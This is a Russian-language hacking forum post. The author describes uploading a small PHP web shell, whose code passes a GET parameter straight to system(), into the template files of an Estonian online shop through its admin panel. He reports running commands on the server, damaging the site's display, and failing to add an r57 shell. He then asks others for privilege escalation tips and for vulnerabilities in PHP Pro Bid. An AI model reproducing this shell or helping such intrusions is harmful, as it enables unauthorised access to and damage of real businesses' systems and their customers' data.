Welemir
Сообщений: 26
Оценки: 0
Присоединился: 2008-08-16 23:38:17.840000
|
Доброй ночи(надеюсь). Значит,так:
Имеется интернет -магазин (эстонский),в админке которого можно редактировать файлы шаблонного типа,написанные на php/html.Залил масенький шелл:
$x = $_GET['x'];
system($x);
if($x) {
echo $x;
}
else {
echo "no!";
}
Но,к моему великому сожалению,побегать по серверу мне не удалось =_=,т.к. не было прав.Работали команды uname и ls (ещё cat),но чтение языковых файлов многого мне не дало.Способ палевный,потому я быстро удалил шелл(т.к. ошибка с корявой функцией отображалась на всём сайте))) ).Но что-то случилось с отображением констант,и терь весь сайт в этих загагулинах)).В общем,я отклонился от темы.Судя по всему,на сайте работает open_basedir,слава Богу сэйф мода там не обнаружено)).При попытке *дописать* код р57 шелла,выдало,что добавить код не получилось,что меня,честно говоря,весьма удивило,так как с предыдущим проблем не возникало.Размер файла скорее всего на это не влияет,но сам языковой фаил почему-то вышел пустой(в окне редактирования).В последнем языковом файле я не стал использовать такие махинации(палево,палево!).В общем,облом вышел походу,т.к.,для поднятия прав необходим полноценный шелл,а не это.Может кто подскажет что-нибудь по этому поводу ? Забивать на это дело не хочется… Кстати,админка Php pro BID (http://www.phpprobid.com).Мб слышал кто ? Или знает какие-то *особенные* уязвимости ? Делаю ставку на количество грамотных пиплов))))).
|
Поднятие прав на шелле. - 
